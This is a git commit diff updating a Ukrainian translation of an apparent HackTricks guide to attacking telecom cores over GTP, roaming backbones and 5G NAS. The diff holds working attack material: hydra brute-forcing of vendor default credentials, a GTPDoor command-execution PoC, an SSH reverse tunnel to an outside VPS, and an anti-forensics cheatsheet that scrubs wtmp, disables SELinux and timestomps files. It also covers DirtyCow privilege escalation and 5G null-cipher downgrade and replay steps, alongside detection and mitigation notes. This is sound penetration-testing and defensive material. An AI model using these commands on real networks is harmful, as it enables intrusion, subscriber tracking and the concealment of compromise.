Translated ['', 'src/generic-methodologies-and-resources/pentesting-netw

2025-10-10 18:36:50 +00:00 · 2025-09-07 20:10:36 +00:00 · 2025-09-07 20:10:36 +00:00 · 0e5df77e95
commit 0e5df77e95
parent b06287dae8
1 changed files with 152 additions and 45 deletions
--- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
@ -1,27 +1,27 @@
-# Telecom Network Exploitation (GTP / Roaming Environments)
+# Експлуатація телекомунікаційних мереж (GTP / Roaming Environments)

 {{#include ../../banners/hacktricks-training.md}}

 > [!NOTE]
-> Протоколи мобільної ядра (GPRS Tunnelling Protocol – GTP) часто проходять через напівдостовірні GRX/IPX роумінгові магістралі. Оскільки вони використовують простий UDP з майже без аутентифікації, **будь-яка точка доступу всередині телекомунікаційного периметра зазвичай може безпосередньо досягти основних сигнальних площин**. Наступні нотатки збирають наступальні трюки, спостережені в природі проти SGSN/GGSN, PGW/SGW та інших вузлів EPC.
+> Протоколи ядра мобільних мереж (GPRS Tunnelling Protocol – GTP) часто проходять через напівдоверені GRX/IPX roaming backbones. Оскільки вони передаються по plain UDP з майже відсутньою автентифікацією, **будь-яка опора всередині периметру оператора зазвичай може безпосередньо дістатися до центральних signalling planes**. Наступні нотатки збирають offensive tricks, спостережувані в реальному житті проти SGSN/GGSN, PGW/SGW та інших EPC вузлів.

-## 1. Recon & Initial Access
+## 1. Розвідка та початковий доступ

-### 1.1  Default OSS / NE Accounts
-Досить велика кількість елементів мережі постачальників постачається з жорстко закодованими SSH/Telnet користувачами, такими як `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Спеціалізований словник значно підвищує успіх брутфорсу:
+### 1.1  За замовчуванням OSS / NE облікові записи
+Дивно велика кількість елементів мережі від вендорів постачається з вбудованими SSH/Telnet обліковими записами, такими як `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Наявність спеціалізованого wordlist значно підвищує успіх brute-force:
 ```bash
 hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
 ```
-Якщо пристрій відкриває лише управлінський VRF, спочатку переходьте через хост-перескок (див. розділ «SGSN Emu Tunnel» нижче).
+Якщо пристрій відкриває лише management VRF, спочатку зробіть pivot через jump host (див. розділ «SGSN Emu Tunnel» нижче).

-### 1.2 Виявлення хостів всередині GRX/IPX
-Більшість операторів GRX все ще дозволяють **ICMP echo** через магістраль. Поєднайте `masscan` з вбудованими UDP-пробами `gtpv1`, щоб швидко відобразити слухачів GTP-C:
+### 1.2  Виявлення хостів у GRX/IPX
+Більшість операторів GRX досі дозволяють **ICMP echo** через магістраль. Поєднайте `masscan` з вбудованими UDP-пробами `gtpv1`, щоб швидко замапити GTP-C listeners:
 ```bash
 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
 ```
-## 2. Перерахунок абонентів – `cordscan`
+## 2. Перелічення абонентів – `cordscan`

-The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses.  Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscriber’s visited PLMN.
+Наступний інструмент на Go формує пакети **GTP-C Create PDP Context Request** і записує відповіді. Кожна відповідь виявляє поточний **SGSN / MME**, що обслуговує запитаний IMSI, а інколи — відвідану PLMN абонента.
 ```bash
 # Build
 GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@ -30,21 +30,21 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
 ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
 ```
 Ключові прапори:
- `--imsi` IMSI цільового абонента
+- `--imsi` Цільовий IMSI абонента
 - `--oper` Домашній / HNI (MCC+MNC)
- `-w`      Записати сирі пакети в pcap
+- `-w`      Записувати raw-пакети у pcap

-Важливі константи всередині бінарного файлу можна патчити для розширення сканувань:
+Важливі константи всередині бінарного файлу можна запатчити, щоб розширити сканування:
 ```
 pingtimeout       = 3   // seconds before giving up
 pco               = 0x218080
 common_tcp_ports  = "22,23,80,443,8080"
 ```
-## 3. Виконання коду через GTP – `GTPDoor`
+## 3. Code Execution over GTP – `GTPDoor`

-`GTPDoor` є маленьким ELF-сервісом, який **прив'язує UDP 2123 та аналізує кожен вхідний GTP-C пакет**. Коли корисне навантаження починається з попередньо поділеного тегу, решта розшифровується (AES-128-CBC) та виконується через `/bin/sh -c`. Стандартний вивід/помилки ексфільтруються всередині **Echo Response** повідомлень, щоб жодна зовнішня сесія ніколи не створювалася.
+`GTPDoor` — невеликий ELF-сервіс, який **прив'язується до UDP 2123 і розбирає кожний вхідний GTP-C пакет**. Коли payload починається з pre-shared tag, решта розшифровується (AES-128-CBC) і виконується через `/bin/sh -c`. stdout/stderr ексфільтруються всередині повідомлень **Echo Response**, тож жодна зовнішня сесія ніколи не створюється.

-Мінімальний PoC пакет (Python):
+Minimal PoC packet (Python):
 ```python
 import gtpc, Crypto.Cipher.AES as AES
 key = b"SixteenByteKey!"
@ -52,40 +52,40 @@ cmd = b"id;uname -a"
 enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
 print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
 ```
-Виявлення:
-* будь-який хост, що надсилає **незбалансовані Echo запити** до IP-адрес SGSN
-* прапор версії GTP, встановлений на 1, коли тип повідомлення = 1 (Echo) – відхилення від специфікації
+Detection:
+* будь-який host, що надсилає **unbalanced Echo Requests** на SGSN IPs
+* GTP version flag set to 1 while message type = 1 (Echo) – відхилення від специфікації

-## 4. Пивотування через ядро
+## 4. Pivoting через ядро

 ### 4.1  `sgsnemu` + SOCKS5
-`OsmoGGSN` постачає емулятор SGSN, здатний **встановити PDP контекст до реального GGSN/PGW**. Після переговорів Linux отримує новий інтерфейс `tun0`, доступний з роумінгового пір.
+`OsmoGGSN` постачається з емулятором SGSN, здатним **establish a PDP context towards a real GGSN/PGW**. Після узгодження Linux отримує новий інтерфейс `tun0`, доступний з боку roaming peer.
 ```bash
 sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
 -APN internet -c 1 -d
 ip route add 172.16.0.0/12 dev tun0
 microsocks -p 1080 &   # internal SOCKS proxy
 ```
-З правильним налаштуванням hair-pinning брандмауера, цей тунель обходить VLAN, що використовуються лише для сигналізації, і приземляє вас безпосередньо в **data plane**.
+При належному firewall hair-pinning цей тунель обходить signalling-only VLANs і потрапляє безпосередньо в **data plane**.

-### 4.2  SSH зворотний тунель через порт 53
-DNS майже завжди відкритий в роумінгових інфраструктурах. Відкрийте внутрішній SSH сервіс на вашому VPS, що слухає на :53, і поверніться пізніше з дому:
+### 4.2  SSH Reverse Tunnel over Port 53
+DNS майже завжди відкритий у роумінгових інфраструктурах. Відкрийте внутрішній SSH-сервіс на вашому VPS, що слухає порт :53, і підключіться пізніше з дому:
 ```bash
 ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
 ```
-Перевірте, що `GatewayPorts yes` увімкнено на VPS.
+Переконайтеся, що `GatewayPorts yes` увімкнено на VPS.

-## 5. Секретні канали
+## 5. Приховані канали

 | Канал | Транспорт | Декодування | Примітки |
-|-------|-----------|-------------|----------|
-| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-байтовий ключ + 14-байтові частини (XOR) | чистий пасивний слухач, без вихідного трафіку |
-| DNS – `NoDepDNS` | UDP 53 | XOR (ключ = `funnyAndHappy`), закодований в октетах A-запису | спостерігає за піддоменом `*.nodep` |
-| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC об'єкт у приватному IE | змішується з легітимним GTP-C спілкуванням |
+|---------|-----------|----------|-------|
+| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | чисто пасивний прослуховувач, без вихідного трафіку |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | слідкує за піддоменом `*.nodep` |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | маскується під легітимний GTP-C трафік |

-Усі імпланти реалізують монітори, які **timestomp** їхні бінарні файли та перезапускаються у разі збою.
+Усі імпланти реалізують watchdogs, які **timestomp** їхні бінарні файли та перезапускаються у разі збою.

-## 6. Чек-лист ухилення від захисту
+## 6. Шпаргалка з ухилення від захисту
 ```bash
 # Remove attacker IPs from wtmp
 utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm    # appears as [kworker/1]
 touch -r /usr/bin/time /usr/bin/chargen   # timestomp
 setenforce 0                              # disable SELinux
 ```
-## 7. Підвищення привілеїв на застарілій NE
+## 7. Privilege Escalation на Legacy NE
 ```bash
 # DirtyCow – CVE-2016-5195
 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
@ -116,25 +116,132 @@ python3 exploit_userspec.py
 userdel firefart 2>/dev/null
 rm -f /tmp/sh ; history -c
 ```
-## 8. Інструменти
+## 8. Tool Box

-* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – спеціалізовані інструменти, описані в попередніх розділах.
-* `FScan` : внутрішні TCP сканування (`fscan -p 22,80,443 10.0.0.0/24`)
-* `Responder` : LLMNR/NBT-NS підроблений WPAD
-* `Microsocks` + `ProxyChains` : легке SOCKS5 півотування
-* `FRP` (≥0.37) : обходження NAT / з'єднання активів
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – власні інструменти, описані в попередніх розділах.
+* `FScan` : сканування TCP у локальній мережі (`fscan -p 22,80,443 10.0.0.0/24`)
+* `Responder` : LLMNR/NBT-NS rogue WPAD
+* `Microsocks` + `ProxyChains` : легке SOCKS5 pivoting
+* `FRP` (≥0.37) : NAT traversal / asset bridging
+
+## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
+
+Процедура реєстрації 5G виконується поверх NAS (Non-Access Stratum) на базі NGAP. Поки NAS security не активовано через Security Mode Command/Complete, початкові повідомлення не автентифіковані і не зашифровані. Це вікно перед активацією безпеки відкриває кілька векторів атаки, якщо ви можете спостерігати або змінювати трафік N2 (наприклад, on-path всередині core, rogue gNB або тестовий стенд).
+
+Registration flow (simplified):
+- Registration Request: UE sends SUCI (encrypted SUPI) and capabilities.
+- Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*.
+- Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
+- PDU Session Establishment: IP/QoS setup.
+
+Lab setup tips (non-RF):
+- Core: Open5GS default deployment is sufficient to reproduce flows.
+- UE: simulator or test UE; decode using Wireshark.
+- Active tooling: 5GReplay (захоплення/модифікація/повторна відправка NAS в рамках NGAP), Sni5Gect (підслухати/запатчити/вставити NAS на льоту без підняття повного rogue gNB).
+- Useful display filters in Wireshark:
+- ngap.procedure_code == 15 (InitialUEMessage)
+- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
+
+### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI
+Expected: UE/USIM must transmit SUCI (SUPI encrypted with the home-network public key). Finding a plaintext SUPI/IMSI in the Registration Request indicates a privacy defect enabling persistent subscriber tracking.
+
+How to test:
+- Capture the first NAS message in InitialUEMessage and inspect the Mobile Identity IE.
+- Wireshark quick checks:
+- It should decode as SUCI, not IMSI.
+- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should exist; absence plus presence of `imsi` indicates витік.
+
+What to collect:
+- MCC/MNC/MSIN if exposed; log per-UE and track across time/locations.
+
+Mitigation:
+- Enforce SUCI-only UEs/USIMs; alert on any IMSI/SUPI in initial NAS.
+
+### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)
+Background:
+- UE advertises supported EEA (encryption) and EIA (integrity) in the UE Security Capability IE of the Registration Request.
+- Common mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 are null algorithms.
+
+Issue:
+- Because the Registration Request is not integrity protected, an on-path attacker can clear capability bits to coerce selection of EEA0/EIA0 later during Security Mode Command. Some stacks wrongly allow null algorithms outside emergency services.
+
+Offensive steps:
+- Intercept InitialUEMessage and modify the NAS UE Security Capability to advertise only EEA0/EIA0.
+- With Sni5Gect, hook the NAS message and patch the capability bits before forwarding.
+- Observe whether AMF accepts null ciphers/integrity and completes Security Mode with EEA0/EIA0.
+
+Verification/visibility:
+- In Wireshark, confirm selected algorithms after Security Mode Command/Complete.
+- Example passive sniffer output:
+```
+Encyrption in use [EEA0]
+Integrity in use [EIA0, EIA1, EIA2]
+SUPI (MCC+MNC+MSIN) 9997000000001
+```
+Заходи пом'якшення (обов'язково):
+- Налаштуйте AMF/policy так, щоб відкидати EEA0/EIA0, за винятком випадків, коли це суворо вимагається (наприклад, екстрені дзвінки).
+- Віддавайте перевагу застосуванню EEA2/EIA2 як мінімум; фіксуйте в логах і піднімайте тривогу для будь-якого NAS security context, який погоджує null алгоритми.
+
+### 9.3 Replay of initial Registration Request (pre-security NAS)
+Оскільки початковий NAS не має цілісності та свіжості, захоплений InitialUEMessage+Registration Request можна відтворити (replay) і надіслати AMF.
+
+PoC rule for 5GReplay to forward matching replays:
+```xml
+<beginning>
+<property value="THEN"
+property_id="101"
+type_property="FORWARD"
+description="Forward InitialUEMessage with Registration Request">
+
+<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
+<event value="COMPUTE"
+event_id="1"
+description="Trigger: InitialUEMessage"
+boolean_expression="ngap.procedure_code == 15"/>
+
+<!-- Context match on NAS Registration Request (message_type == 65) -->
+<event value="COMPUTE"
+event_id="2"
+description="Context: Registration Request"
+boolean_expression="nas_5g.message_type == 65"/>
+
+</property>
+</beginning>
+```
+На що звертати увагу:
+- Чи приймає AMF replay і переходить до аутентифікації; відсутність перевірки свіжості/зв'язування контексту вказує на вразливість.
+
+Заходи пом'якшення:
+- Забезпечити захист від replay і зв'язування контексту на AMF; застосувати rate-limit і корелювати на рівні per-GNB/UE.
+
+### 9.4 Tooling pointers (reproducible)
+- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
+- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
+- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
+- Sni5Gect: у режимі live перехоплюйте/змінюйте/впроваджуйте в NAS control-plane, щоб примусити null алгоритми або порушити послідовності аутентифікації.
+
+### 9.5 Чекліст захисту
+- Постійно інспектуйте Registration Request на предмет незашифрованих SUPI/IMSI; блокувати пристрої/USIMs, що порушують правила.
+- Відхиляти EEA0/EIA0, за винятком чітко визначених аварійних процедур; вимагати як мінімум EEA2/EIA2.
+- Виявляйте підроблену або некоректно сконфігуровану інфраструктуру: неавторизовані gNB/AMF, несподівані N2 peers.
+- Генерувати оповіщення про NAS security modes, що призводять до null алгоритмів або частих повторів InitialUEMessage.

 ---
 ## Ідеї для виявлення
-1. **Будь-який пристрій, окрім SGSN/GGSN, що встановлює запити на створення PDP контексту**.
-2. **Нестандартні порти (53, 80, 443), що отримують SSH рукопожаття** з внутрішніх IP-адрес.
-3. **Часті Echo запити без відповідних Echo відповідей** – можуть вказувати на сигнали GTPDoor.
-4. **Висока частота ICMP echo-reply трафіку з великими, ненульовими полями ідентифікатора/послідовності**.
+1. **Будь-який пристрій, відмінний від SGSN/GGSN, який встановлює Create PDP Context Requests**.
+2. **Неcтандартні порти (53, 80, 443), що отримують SSH handshakes** з внутрішніх IP.
+3. **Часті Echo Requests без відповідних Echo Responses** – може вказувати на GTPDoor beacons.
+4. **Висока інтенсивність ICMP echo-reply трафіку з великими, ненульовими полями identifier/sequence**.
+5. 5G: **InitialUEMessage, що містить NAS Registration Requests, повторювані з однакових кінцевих точок** (сигнал replay).
+6. 5G: **NAS Security Mode, що погоджує EEA0/EIA0** поза аварійними контекстами.

 ## Посилання

- [Palo Alto Unit42 – Проникнення в глобальні телекомунікаційні мережі](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 – Протокол тунелювання GPRS (v16.4.0)
+- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
+- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
 - 3GPP TS 29.281 – GTPv2-C (v17.6.0)
+- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
+- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
+- 3GPP TS 33.501 – Security architecture and procedures for 5G System

 {{#include ../../banners/hacktricks-training.md}}